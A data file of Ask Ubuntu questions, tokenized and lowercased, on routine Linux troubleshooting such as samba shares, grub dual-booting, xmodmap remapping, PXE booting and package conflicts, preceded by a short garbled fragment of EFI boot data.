.9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5. } ... e ... ... ... ... ... . boot0014 setup boot0015 boot menu boot0016 diagnostic splash boot001c* lenovo recovery system acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00010000000000hd ( 3,276800,1f4000,26c6992a-07b8-43bc-98b8-d8c83e64db3b ) file ( \efi\microsoft\boot\lrsbootmgr.efi ) boot001d* pci lan : efi network ( ipv6 ) acpi ( a0341d0,0 ) pci ( 1c,1 ) pci ( 0,0 ) mac ( 089e01381698,0 ) 030d3c000000000000000000000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000x.j.+*.n ... ..=8 .
489972	use imagemagick to compare images	i want to compare a source png file to a compressed file . i am using imagemagick and this command : convert image1 image2 -compose difference -composite \ -colorspace gray -format ' % [ fx : mean*100 ] ' info : but what i get is a very odd number . i am looking from a number from 0-100 % . when i compared two totally different images i still get a 8.37885 . so good people of ask ubuntu , can you provide me with a command that will measure the difference between files properly and give me a number from 0-100 ?
489975	samba wont let me write to some shares	i 'm pretty new to ubuntu and am having some problems with samba . i am using xbmcbuntu and i have a few shares which i share with my family and some that i do n't . you can see this in my config file . [ global ] workgroup = workgroup server string = % h server ( samba , xbmc ) netbios name = xbmc dns proxy = no name resolve order = hosts wins bcast guest account = scrub load printers = no show add printer wizard = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n $ pam password change = yes map to guest = bad user force user = matt force group = matt [ pictures ] path = /home/matt/hdd1/pictures comment = pictures writeable = yes browseable = yes guest ok = yes [ system ] path = /home/matt/.xbmc comment = xbmc system share valid users = matt writeable = yes browseable = yes guest ok = no [ root ] path = / comment = root acess valid users = matt writeable = yes browseable = yes guest ok = no [ other ] path = /home/matt/hdd1/other comment = other valid users = matt writeable = yes browseable = yes guest ok = no the `` pictures '' share is working correctly , anyone can read/write to it . the `` system '' share is working correctly , only i can read/write to it . however the `` root '' and `` other '' shares do n't work as i want , i am the only one who can read but i ca n't write . i 've tried changing some file system permissions but i 'm not too familiar with them and i 'm not convinced that is the problem . any help would be awesome .
489977	hp elitebook 8570p wireless button do n't turn on	i got a new hp elitebook 8570p laptop . after installation of ubuntu 14.04 amd64 alternate most things work except wireless . the wireless touch button/switch above the keyboard is always colored orange which , reading the manual , means `` off '' . does not change when i touch it . how can i activate the wireless-switch ? thank you in advance , yusuf
489986	is securing phpmyadmin with .htaccess considered sufficient ?	i have just installed linux / ubuntu for the first time in order to learn , and to get some experience with lamp servers . i also installed phpmyadmin and used an .htaccess file ( stored in /usr/share/phpmyadmin , iirc ) which points to an .htpasswd file in /etc/phpmyadmin . is this considered `` enough '' to protect phpmyadmin from other intruders ? is there any way someone could interact with any part of phpmyadmin without first authenticating themselves via that .htaccess username/password ?
489987	how to share ubuntu desktop 's screen from os x mavericks	attempting to access ubuntu 14.04 client 's screen via screen sharing from mavericks ( mac os x 10.9.3 ) system on the same network , but the ubuntu client 's desktop never displays in mavericks/mac 's screen sharing app . mavericks finder does display the ubuntu client 's screen icon and name in the sidebar . on selecting the sidebar entry , share screen button is displayed and available in the finder window . on selecting the share screen button , i am prompted for the remote desktop password ; after entering it and selecting connect , the spinner progress indicator appears on the mavericks finder dialog , and that is the last thing that happens . i do see the gnome screen sharing icon in the menu bar of the ubuntu client , and it responds to selection events on the ubuntu client ( showing v3.8.1 when about is selected ) .
489991	14.04 : double click in eclipse no longer opens files	mostly a nuisance , that has been bugging me for a few days : double clicking on a file in the project tree no longer opens it in the associated editor ( actually it does nothing ) . with the same version of eclipse ( kepler ) on 13.10 double clicking in the project tree functions as expected . update : this issue is also affecting the outline window , doubling click on its items no longer advances the cursor to the correct place in the file . another strange behaviour that might be related is the right click on the project tree , which occasionally brings the context menu of the wrong project . what can be the cause of this change of behaviour ? any particular unity/compiz settings i should look into ?
489999	can i install gnome 3.12 on ubuntu 12.04 ?	like my questions says . can i install gnome 3.12 on ubuntu 12.04 ?
490000	juju bootstrap using maas unable to ssh into nodes	trusty : 14.04 trying to bootstrap juju using maas environment using juju -v -- debug bootstrap -e maas but the process gets stuck in the lines shown below and finally times out . my maas nodes are in ready state . when i tried to execute the ssh command in the system shell of the maas host and i was able to connect successfully . i do not understand why juju does not proceed even if the ssh is successful . i have tried this with juju 1.18.x [ stable ] as well as 1.19.x [ devel ] the following is the log trace.. lot of logs ... . 2014-06-30 13:29:44 debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/dcadmin/.juju/ssh/juju_id_rsa -i /home/dcadmin/.ssh/id_rsa ubuntu @ dc1dt8.maas /bin/bash 2014-06-30 13:29:46 debug juju.utils.ssh ssh_openssh.go:122 running : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/dcadmin/.juju/ssh/juju_id_rsa -i /home/dcadmin/.ssh/id_rsa ubuntu @ 192.168.35.29 /bin/bash can anyone please help . thanks , prasanna
490008	where did the easy_install and pip packages go ?	i wrote a bash script which automates the installation of an application based on erpnext 3.6.1* on my ubuntu 14.04 lts laptop . part of the script installs required dependencies using apt-get install , which include pip and easy_install . the script worked fine a couple days ago , but now when i try to run it , this step fails with the following error messages from apt-get in the terminal : reading package lists ... building dependency tree ... reading state information ... e : unable to locate package easy_install e : unable to locate package pip i can not find these packages in the ubuntu software center either , although i do still have the commands installed on my system ( see below ) and a search for either in the ubuntu software center returns the installed package python-pip as the first result . i also ran the following to try and figure out which package owns the installed commands : christopher @ skytemple : ~ $ whereis easy_install easy_install : /usr/local/bin/easy_install christopher @ skytemple : ~ $ dpkg -s /usr/local/bin/easy_install dpkg-query : no path found matching pattern /usr/local/bin/easy_install christopher @ skytemple : ~ $ whereis pip pip : /usr/bin/pip /usr/bin/x11/pip /usr/local/bin/pip /usr/local/bin/pip2.7 /usr/share/man/man1/pip.1.gz christopher @ skytemple : ~ $ dpkg -s /usr/bin/pip python-pip : /usr/bin/pip did pip and easy_install recently roll into python-pip ? or are they altogether gone now ? i need to know how i should update my script , if needed . * out of date , i know , but this is what my employer has supplied from our contractor , so i need to work with it .
490009	new to webservers	my boss asked me to take a look at the web server if i could and see what was causing some issues . it looks like i have tonnes of logs and i am not sure what to make of them . any help that would be greatly appreciated . apache2 debug.2.gz kern.log mail.log.4.gz news apparmor debug.3.gz kern.log.1 mail.warn proftpd apt debug.4.gz kern.log.2.gz mail.warn.1 pycentral.log auth.log dist-upgrade kern.log.3.gz mail.warn.2.gz samba auth.log.1 dmesg kern.log.4.gz mail.warn.3.gz syslog auth.log.2.gz dmesg.0 lastlog mail.warn.4.gz syslog.1 auth.log.3.gz dmesg.1.gz lpr.log messages syslog.2.gz auth.log.4.gz dmesg.2.gz mail.err messages.1 syslog.3.gz auth.log.6.gz dmesg.3.gz mail.err.1 messages.2.gz syslog.4.gz auth.log.7.gz dmesg.4.gz mail.err.2.gz messages.3.gz syslog.5.gz boot dpkg.log mail.err.3.gz messages.4.gz syslog.6.gz btmp dpkg.log.1 mail.err.4.gz mysql syslog.7.gz btmp.1 dpkg.log.2.gz mail.info mysql.err tomcat5.5 daemon.log dpkg.log.3.gz mail.info.1 mysql.log tomcat6 daemon.log.1 dpkg.log.4.gz mail.info.2.gz mysql.log.1.gz udev daemon.log.2.gz dpkg.log.5.gz mail.info.3.gz mysql.log.2.gz user.log daemon.log.3.gz dpkg.log.6.gz mail.info.4.gz mysql.log.3.gz wtmp daemon.log.4.gz dpkg.log.7.gz mail.log mysql.log.4.gz wtmp.1 daemon.log.6.gz faillog mail.log.1 mysql.log.5.gz debug fsck mail.log.2.gz mysql.log.6.gz debug.1 installer mail.log.3.gz mysql.log.7.gz
490011	constant high cpu usage - even after reboot with no applications	here is a problem , a lists of my attempts to solve it , and a plea for help : [ as indicated , i have read all similar 'answered ' questions , and have not found an answer that works for me . ] problem : constant high cpu usage : data below=immediately after fresh boot , no apps running cpu0 - constantly at some combination which adds up to 100 % however ... % cpu in list = between 0 & 20 % ... `` top '' reports zero 'zombies' tasks : 165 total , 1 running , 164 sleeping , 0 stopped , 0 zombie cpu0 : 50.0 % us , 50.0 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st cpu1 : 1.7 % us , 1.0 % sy , 0.0 % ni , 97.4 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2055512k total , 1645712k used , 409800k free , 465680k buffers swap : 2086908k total , 0k used , 2086908k free , 888712k cached pid user pr ni virt res shr s % cpu % mem time+ command 1074 root 20 0 40488 18m 7800 s 3 0.9 3:39.51 xorg 1745 owlsglob 20 0 245m 55m 25m s 2 2.8 3:49.67 compiz 14736 owlsglob 20 0 81228 14m 10m s 2 0.7 0:03.10 gnome-terminal 14802 owlsglob 20 0 2852 1184 892 r 1 0.1 0:03.95 top 29 root 20 0 0 0 0 s 0 0.0 0:12.10 kworker/1:1 1754 owlsglob 20 0 3716 792 660 s 0 0.0 0:04.59 syndaemon 1819 owlsglob 20 0 27192 10m 3084 s 0 0.5 0:09.76 python 1847 owlsglob 20 0 63524 5752 3308 s 0 0.3 1:13.09 hud-service top - 06:03:47 up 1 day , 13:58 , 2 users , load average : 0.16 , 0.29 , 0.34 tasks : 170 total , 1 running , 169 sleeping , 0 stopped , 0 zombie cpu0 : 80.6 % us , 19.4 % sy , 0.0 % ni , 0.0 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st cpu1 : 6.9 % us , 1.0 % sy , 0.0 % ni , 92.1 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2055512k total , 1039472k used , 1016040k free , 102308k buffers swap : 2086908k total , 194356k used , 1892552k free , 538256k cached pid user pr ni virt res shr s % cpu % mem time+ command 1744 owlsglob 20 0 287m 34m 17m s 8 1.7 16:54.45 compiz 13997 owlsglob 20 0 81804 14m 10m s 6 0.7 0:02.30 gnome-terminal 1063 root 20 0 66408 28m 10m s 6 1.4 21:58.16 xorg 14060 owlsglob 20 0 2852 1276 980 r 1 0.1 0:02.64 top 495 syslog 20 0 31064 884 716 s 0 0.0 0:05.21 rsyslogd note : this problem began only after a complete reinstall of 12.04 . i noticed it following installations and de-installation of clamav & comodo . attempts to solve the problem scoured `` askubuntu '' and `` ubuntu one '' biggest 'attempt ' : changing nvidia : read http : //www.dedoimedo.com/computers/ubuntu-pangolin-nvidia.html http : //ubuntuforums.org/showthread.php ? t=1984596 downloaded & installed - [ link deleted - i do n't have 10 reputation points ] result : installed nvidia did not solve the problem totally messed up display properties large , unchangeable icons not recognising / could not access my xp partitions software centre `` removal '' made no improvement synaptic : removed nvidia-304 , nvidia-common , nvidia-settings , nvidia-settings-304 restart restored previous 'unity ' settings * cpu problem persists considered investigating xorg : - some links suggest that xorg is no longer a part of precise [ link deleted - i do n't have 10 reputation points ] however , it 's there on my maching question - would adjusting xorg.conf help to solve the high cpu usage ? one post suggests that 'apt-get ' might be running in the background ... [ link deleted - i do n't have 10 reputation points ] question - could a program be running in the background , without `` top '' detecting it ? `` cpu 100 % - phantom usage '' - [ link deleted - i do n't have 10 reputation points ] question - this post suggests a `` zombie process '' - but ... `` top '' says 'zero zombies ' ? ! ? one post made suggestions i have n't tried because i ca n't understand them : [ link deleted - i do n't have 10 reputation points ] also read ... but answers did not seem to apply to my situation : [ link deleted - i do n't have 10 reputation points ] [ link deleted - i do n't have 10 reputation points ] plea - can anyone help me resolve this problem , please . system : toshiba nb200 intel atom cpu n280 @ 1.66ghz x 2 graphics - unknown , os 32-bit , disk 16.8 gb ubuntu 12.04 lts thank you ! bryan
490015	debian.cnf file location in ubuntu 14.04	where can i find the `` debian.cnf '' file in ubuntu 14.04 ? it was under `` /etc/mysql/debian.cnf '' in ubuntu 12.04 . is there some location changes or name changes ? what i want is to reset mysql root password , using `` debian-sys-maint '' user right . i am now trying to find the file following this one . thanks for any help / advice
490023	modify ubuntu toolchain	in version 11.10 the flag `` -- as-needed '' became default in the ubuntu toolchain . due to many problems i have with undefined symbols at runtime i do n't want to change all the makefiles anymore . i want to remove this behavior from my ubuntu again . but i do n't find the place in the system where these defaults are set . so where can i get rid of this behavior system-wide ?
490025	error when trying to open `` trash '' through nautilus . any alternatives ?	pretty simple error . when i try to open `` trash '' through nautilus , i get a dialog box displaying the following : 'sorry , could not display all the contents of âtrash : ///â : operation not supported' i need a file ( several thousand , actually ) that i accidentally deleted this morning . google has very little to say on this particular error . most of the forum posts i 've found are 5+ years old , or have gone unresolved . so i 'm pretty hopeless . are there any alternatives to using the trash utility to restore files ? thanks a lot !
490026	texmaker not displaying the menu bar with ubuntu 14.04 and gnome 3	i installed texmaker 4.2 ( qt5 ) on my ubuntu 14.04 ( gnome 3 ) . the installation went smooth but i do n't have a menu bar and therefore i can not configure the texmaker . my program looks like this screenshot http : //www.xm1math.net/texmaker/texmakerqt5_ubuntu.png . since my program looks like ( this http : //t02i.imgup.net/screenshote5a7.png ) the screenshot from the developer i assume there is no bug . can someone please tell me how i am able to access the menu bar and configure the program . is this a gnome shell issue ?
490032	switching back to nvidia after redock lenovo w520	this is using a lenovo w520 and the dual video port docking station . i am trying to undock with switching to the intel video card and re-dock switching back to the nvidia card . 1 ) boot attached to the dock using both monitors 2 ) in the nvidia-settings tool use the nvidia-prime profile switch to the intel video card 3 ) log off and undock 4 ) log on use the system 5 ) in the nvidia-settings tool use the nvidia-prime profile switch to the nvidia card 6 ) log off and dock 7 ) log in and i 'm stuck with the built in monitor and none of the usual nvidia configuration information is in the nvidia-settings gui 8 ) rebooting an i 'm back at step 1 this is my main business desktop while having to re-log in is annoying . rebooting just takes too long . the bios is set to use optimus . the os is xubuntu 14.04 .
490034	ca n't burn cd 's on ubuntu	hey it 's me again with another question , so i 've been trying to burn ios and other things to my cd but before it starts the burn process it spits the cd out , i do n't think there is another question out there same as this , i did n't see one so i hope this is a first , there are a few that are close just not the same . but um i 've uninstalled other cd burning applications and installed new ones but they all do the same thing , they just eject the cd before anything is done . is there anything i can do to fix this or no ? my system is ubuntu 14.04 , my laptop is a 64 bit hp compaq presario cq56 .
490036	curl - 404 error when trying to post a file	forgive my linux n00bishness , i 'm only just starting out ! i 'm trying to post a file to a windows web listener using curl but am receiving an error that i have n't been able to find an explanation for online . i 've never used curl before ( and am very new to linux in general ) so i do n't know where to look for the issue . here 's what i 've done so far : navigated to the file directory /home/user/documents used the command curl -- form `` fileupload= @ mesh.pcap '' http : //xxx.xxx.xxx.xxx ( the file is obviously a pcap file , and the listener is being accessed by ip , simply trying to push the file to any location on the target ) and i receive the following message in the terminal : < ! doctype html public `` -//w3c//dtd html 4.01//en '' '' http : //www.w3.org/tr/html4/strict.dtd '' > < html > < head > < title > not found < /title > < meta http-equiv= '' content-type '' content= '' text/html ; charset=us-ascii '' > < /head > < body > < h2 > not found < /h2 > < hr > < p > http error 404 . the requested resource is not found. < /p > < /body > < /html > now i 'm doing this all based on the curl manpage , but have no idea if i 'm doing it right at all , so if this does n't even make sense please explain why and i 'll do my best to clarify or try whatever suggestions you may have . i think i 'm on the right track but the 404 error is confusing me and there is no file actually being transferred . what am i missing ? edit : some context ... basically i have a pcap file on the linux box that i want to send to the web listener to be parsed . i do n't necessarily need the file itself , as long as the data comes across one way or another . i 'm trying to simulate something that a contractor is developing for us , my part is being able to parse the data from the pcap . he said he 's sending it through curl , so i thought i 'd set up a little mock environment for testing purposes so we do n't have to have a fully-running system before i can do my end of the task .
490037	system ( `` echo * > toto '' ) returns an error	when i test this command : system ( `` echo * > toto '' ) ( the file toto exists ) this error is returned : bash : syntax error near unexpected token '' /bin/echo x '' '` and i do n't understand why . thank you in advance for you advices .
490039	avconv slideshow from images - first image appears for split second	i am currently using the following command to generate a slideshow from all jpg 's in the current directory : avconv -r 1/5 -f image2 -i % 03d.jpg -r 25 -c : v mpeg2video output.mpg the command almost works , except that the very first jpg only appears for a split second . all other jpg 's in the directory appear for 5 seconds as expected . does anyone know what i can do to resolve the glitch ? ( i am using ubuntu 12.04 lts on the latest 64 bit kernel . )
490040	after install grub boot loader does not show	i ' m having some trouble finalizing my ubuntu setup . i have installed ubuntu 14.04 on my windows 7 acer , k95v and i just ca n't get to the boot loader . the current situation is that it just boots up windows and i do not get any boot loader where i can choose a os . as you can see in my paste i also have windows 7 installed and i want it to have them both on my pc . here is my boot-info : http : //paste.ubuntu.com/7726768/ when i run boot-repair through command line it give 's me this two rules after i launch it : /usr/share/boot-sav/gui-g2slaunch.sh : line 33 : hash : gksudo : not found /usr/share/boot-sav/gui-g2slaunch.sh : line 35 : hash : gksu : not found then there pop 's up a window with the message : efi detected . please check the options . then when i follow through the standard procedure i get this error report : http : //pastebin.com/cgx6ucgl ive searched the web for a couple of days now to fix it . i 'm out of idea 's how to fix this on a save as possible way . the windows keeps booting and i cant seem to get grub on my screen in any way i tried . edit : the os does not show in the bios . it only shows me the windows boot manager and my vd player to boot to .
490044	network booting could't find kernel image	i have a problem with pxe booting . i followed this instruction on official website . but i get an error on client machine : could not find kernel image : vmlinuz-3.13.0-24-generic and now , question . this image should be in pxelinux.cfg folder , am i right ? i 'm extremely waiting for your answers , guys !
490045	remote with mythbuntu	i think i have found what may be my issue but i dont know how to fix it with my remote not working in mythbuntu . it is complaining about a file missing in sys/class/rc/* my issue is there are absolutely no files or folder in there . it stops at sys/class/rc then empty . i was on the mythbuntu forum sat and one of the guys got on my machine remotely and tried to help but he he coudlnt figure it out either . it see the mce ir usb remote reciever but doesnt seem to load anything for it . he tried to copy files over to it but he couldnt get and access to it even as root . he suggested a new hard drive and a new dowwnload of mythbuntu . i did both and completely reinstalled it but it still does the exact same thing . i have 3 different recievers but i cant get any of them to work . can anyone help me with this please . thanks
490046	virtual host in xampp ( help )	i want to create the virtual host in xampp . thus i googled for it . and i did the same changes in my config files like as virtual host in xampp . but when i went http : //localhost2 it say 's me : access forbidden ! you do n't have permission to access the requested directory . there is either no index document or the directory is read-protected . if you think this is a server error , please contact the webmaster . error 403 localhost2 apache/2.4.9 ( unix ) openssl/1.0.1g php/5.5.11 mod_perl/2.0.8-dev perl/v5.16.3 i also googled for this problem . but nothing could help me . here is my `` /etc/hosts '' and `` virtual host '' configuration files please help . thanks in advance .
490047	black squares on screen ubuntu 14.04 + wine	i discovered a bug in the ubuntu 14.04 . when i play games , black squares appear on the screen . i upgraded xorg , but the same . what could be the problem ? please help me ! i tried several games as well . with wine 1.7.20 and 1.6.2 stable . only 14.04 trusty tahr .
490048	undo whatever lm-sensors has done	i have accepted all the 'risky ' things lm-sensors wanted to do with my system since this answer told me so . my computer is now getting a lot hotter than before , even outside of ubuntu , and i think it is due to that . how to undo whatever changes lm-sensors has made to my system ?
490049	keyboard remapping lost after keyboard layout change	i see similar questions have already been asked before on this site , by i found no satisfactory answer so far . so here 's my exact situation in detail . i recently installed and customized ubuntu 14.04 on a macbook air ( with the unity desktop ) and it works very well for the most part , but i still have one remaining issue with the keyboard layout . i often need to switch between french canadian and american english keyboard layouts ( english being the default ) . i wanted to both remap the mac modifier keys to a more pc-like layout and correct a bad out-of-the-box mapping of the backquote/tilda key in the upper-left corner of the keyboard ( which gives me the < > symbols instead ) . after looking for solutions , i ended up putting the following code in a file called xmodmappings located in ~/.config/autostart : ! clean most of the modifiers clear control clear mod4 clear mod1 ! -- -- -- -- -- -- -- -- - ! left side ! -- -- -- -- -- -- -- -- ! keycode 64 is the left alt key keycode 64 = super_l ! key code 133 is the left command key keycode 133 = alt_l meta_l ! -- -- -- -- -- -- -- -- -- ! right side ! -- -- -- -- -- -- -- -- -- - ! key code 134 is the right command key keycode 134 = alt_r meta_r ! keycode 108 is the right alt key keycode 108 = control_r add mod4 = super_l add mod1 = alt_l meta_l add mod1 = alt_r meta_r add control = control_l add control = control_r ! remapping the upper-left key ( keycode 94 ) keycode 94 = grave asciitilde i also put a file called xmodmappings.desktop in the same directory with the following content and made sure it was visible and activated in the startup applications window : [ desktop entry ] type=application exec=xmodmap /home/sebastien/.config/autostart/xmodmappings hidden=false nodisplay=false x-gnome-autostart-enabled=true name=xmodmap comment=change keyboard configuration after doing all that , everything worked fine on startup with the default english layout . now here 's my problem . when i switch to the french layout using the alt+space keyboard shortcut , i lose the remapping of modifier keys . when i switch back to english , the problem persists and i also get back the incorrect mapping of the backquote/tilda key . in other words , the effect of calling xmod is cancelled when i switch layout , so i have to call `` xmodmap xmodmappings '' manually afterwards . is there a way i can automatically call a xmod remapping script every time i switch keyboard layout ? preferably , i should be able to remap the upper-left key in a different way depending on whether i switch from french to english or the other way around . thanks
490052	trying to map < ctrl > + < hjkl > to < left down up right > globally ( vim-like arrow keys ) with xmodmap	i am trying to map ctrl+h , j , k , l to arrow keys left , down , up , right , respectively , on ubuntu os ( globally , not inside vim ) . i 've attempted the solution posted here , but the modifier commands are not working . here is what i am trying : xmodmap -e `` keycode 45 control_l = k up '' xmodmap -e `` keycode 45 control = k up '' ( keycode 45 maps to `` k '' ) neither commands work . ( they give no errors , but ctrl+k is not remapped to up arrow ) is there a way to do this xmodmap , and if not , is there a cleaner workaround ? thanks ! edit : i have found my answer here - thanks to swift
490062	lubuntu - sd card not showing up !	using the latest version of lubuntu ( x64 ) . just popped in the card - does n't show up anywhere . no idea how i 'd go about fixing this , as the other distros i 've tried have all had no issues detecting removable media . it 's definitely not the sd card or the slot itself malfunctioning , as this card is perfectly usable on other devices .
490063	is there any color managed video player for linux ?	i have a wide gamut display , but any video out there is intended for playback on rec . 709 or srgb device , so is there any color managed player to handle this ? i do n't care if it supports system-wide cms , .icc profiles or 3d luts , i can use either . p. s. i 'm aware of ffmpeg -vf lut3d feature , but i do n't know how to build ffmpeg with lut3d support . and as far as i know it does n't support gpu acceleration so it may be unusable for hd videos . but if you can give me any hints on building ffmpeg with correct options that will be helpful anyway .
490066	clarification on sharing ntfs and installing grub2 with windows 8.1	i have a small amount of experience with installing ubuntu ( i.e . dual-booting on a macbook and replacing vista on an old hdd ) , but i am now planning on dual-booting my asus laptop ( currently running windows 8.1 ) with 14.04 , and i have gathered that it is an entirely different beast . so , i was hoping to get some clarification on a couple points that i have heard conflicting or incomplete information about in the past , before i make any rash decisions . first , i understand that windows and ubuntu both support ntfs . is it , then , logical to shrink the windows partition by a fair margin and make a relatively small root partition for ubuntu , and then fill the rest of the space ( excluding swap , etc . ) with /home to share between both oss , or would this cause problems or require additional steps that i am currently unaware of ? would it be better to have a small /home partition solely for ubuntu and another large ntfs one to share ? and if so , how would i go about permanently mounting that to both operating systems so that they can be read and written to from either side , or is it somewhat automatic ? second , i have heard from some that in order to avoid windows overwriting grub , it should be installed on the ubuntu partition . i have also heard that is is highly likely to cause problems and might not work at all . is it easier to install the boot loader on the windows partition and just keep the live cd handy in case of disaster ?
490068	how to adjust brightness on lubuntu ?	i ca n't adjust my screen brightness . indeed , i ca n't find this option in my system parameters . i am using lubuntu 12.04 . thank you for your time : )
490070	network booting mounting problem	i 'm trying to set up a server for diskless clients . my previous ( solved ) issue is here . but i have a new one . it is n't able to load ubuntu because of error : mount : mounting /nfsroot on /root failed : no such file or directory . mount : mounting /dev on /root/dev failed : no such file or directory . mount : mounting /sys on /root/sys failed : no such file or directory . mount : mounting /proc on /root/proc failed : no such file or directory . target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . after these messages it loads initramfs . guys , i 'm waiting for your answers ! )
490073	postgis dependency conflicts ( ubuntu 14 )	i asked this over on so , but now i 'm thinking the problem is mainly package management and belongs here . subsequent to all the detail that can be found in the original post , i have tried ( sudo eliminated as redundant ) : $ apt list | grep gdal | grep installed gdal-bin/trusty , now 1.11.0+dfsg-1~exp2~trusty1 amd64 [ installed ] libgdal1h/trusty , now 1.11.0+dfsg-1~exp2~trusty1 amd64 [ installed , automatic ] $ apt-get purge gdal-bin $ apt-get purge libdal1h $ add-apt-repository ppa : ubuntugis/ppa $ apt-get update w : failed to fetch http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntugis/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found so clearly something is misconfigured ... i do n't know what to check for on my side ... then $ fab vagrant.provision # see the original question above for what this is doing at the linux level this still runs into the exact same libdal1 v. libgdal1h dependency issue : [ localhost ] sudo : debian_frontend=noninteractive apt-get install -- quiet -- assume-yes postgresql-9.3-postgis-2.1 [ localhost ] out : { ... } [ localhost ] out : some packages could not be installed . this may mean that you have [ localhost ] out : requested an impossible situation or if you are using the unstable [ localhost ] out : distribution that some required packages have not yet been created [ localhost ] out : or been moved out of incoming . [ localhost ] out : the following information may help to resolve the situation : [ localhost ] out : [ localhost ] out : the following packages have unmet dependencies : [ localhost ] out : postgresql-9.3-postgis-2.1 : depends : libgdal1 ( > = 1.9.0 ) but it is not going to be installed [ localhost ] out : recommends : postgis but it is not going to be installed [ localhost ] out : e : unable to correct problems , you have held broken packages . more info : vagrant @ ubuntu-14 : ~ $ apt-cache policy postgresql-9.3-postgis-2.1 postgresql-9.3-postgis-2.1 : installed : ( none ) candidate : 2.1.3+dfsg-3.pgdg12.4+2 version table : 2.1.3+dfsg-3.pgdg12.4+2 0 500 http : //apt.postgresql.org/pub/repos/apt/ precise-pgdg/main amd64 packages 2.1.2+dfsg-2 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages
490074	ubuntu 14.04 loads without gui ( can access terminal ) - xorg.log & screenshot	i really need your help on finding out what can i do with this problem . i found some `` fixes '' online but none of them was helpful . i am kind of new to ubuntu ( and linux in general ) . if i am missing something that can help you figure it out - tell me and i will upload it . when ubuntu loads up , all i see is a blinking cursor - i can access the terminals with ctrl+shift+f1-f6 but i ca n't get the gui to start working again . this is the screen i get when i am trying to run startx from the terminal : ( i dont have enough reputation to post images : < ) http : //i.stack.imgur.com/isyhr.jpg and this is the log file ( xorg.0 ) . update : still i ca n't seem to find the problem . i have tried everything i came across searching the web or in the replies below . by looking at the log , i ca n't see anything wrong ( some errors on fallbacks but it should n't cause this problem to my understanding . )
490077	can i use a windows drive as '/home ' for the ubuntu install ?	i have a windows 7 laptop with 2 drives on hdd both in ntfs , c drive , where windows is installed , and d drive where i store all my files ( everything except windows system files and softwares ) . i want to have a dual boot laptop where i build/port aosp ( android open source project ) on my ubuntu os and use windows 7 as my other os . so since i have a lot of space on my d drive i was wondering if i made d drive my '/home ' would it be a bad idea ? and can i do that and still see all the data on my d drive ? i have n't installed my ubuntu yet , but that 's no big deal ! ; p. i 'm thinking of dedication 8 gb for my swap and 10 gb for root and the rest can be shared in '/home ' and drive d , if possible .
490080	installing ubuntu on lenovo ideatab lynx k3011	this is my first forum post . i recently purchased a lenovo ideatab lynx k3011 equipped from the factory with windows 8 . i have been using ubuntu for years and want to install ubuntu desktop 14.04 on the device . enter problems ... i can not make the device boot to usb . fastboot and secure boot have been disabled . i have tried several different bootable usb and partition schemes ( including efi ) with no joy . can someone with experience using this product guide me in the right direction ? thanks to all in advance .
490081	unable to get hybrid graphics to work ( fglrx )	i am very sorry to annoy you with another fglrx issue , but i am simply unable to figure out a solution.. so my problem starts as i have two graphics cards inside my laptop supposed to work hybrid . intel hd4000 amd radeon hd7970 i wanted my radeon to run opencl and opengl . after some investigation i found out that one can switch to the discrete graphics card using switcheroo ( at this point i think there is some standard driver installed for the radeon ) . so i followed the instructions on http : //wiki.ubuntuusers.de/hybrid-grafikkarten/switcheroo , but it turned out that there is a problem . the discrete radeon does n't seem to change any status . it just stays `` dynoff '' : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynoff:0000:01:00.0 now i did some more research and tried to install a propretiary driver fglrx in a second attempt . but no matter what i do i ca n't make that work . if i install it via apt-get and try to type fglrxinfo , it prints command not found . if i change directory , this is what i get : display : :0 screen : 0 opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 10.1.3 and when i try to run catalyst control center amdcccle or sudo amdconfig -- initial , i get an output saying there are n't any supported adapters ... i really appreciate any contribution ... thanks .
490084	how to install boot-repair ?	i can not get boot-repair to be installed . i opened the terminal and followed the steps on https : //help.ubuntu.com/community/boot-repair , but it did n't work . can someone help me install it and get it to repair my boot because i ca n't boot into windows now . from windows , i installed ubuntu on a local drive ( e : ) , but could n't boot into it so i decided to install ubuntu onto my external usb hard drive . when i got into the ubuntu installation , i deleted the e : drive with the other ubuntu stuff . now , when i try to boot into windows , i got a whole different issue . i do n't remember the issue but i can find out if you need it .
490087	ctrl+x suddenlynot works | ubuntu 14.04 desktop	suddenly ctrl+x does n't works.. i tried everything and i have no idea : o *it actually happened to me even before i upgraded to ubuntu 14.4 desktop
490089	install ubuntu from usb	i need to install ubuntu server without cd/dvd driver . i have read a guide to make a bootable usb using windows , but on my other pc i have mac os . can i make a bootable usb from mac os ?
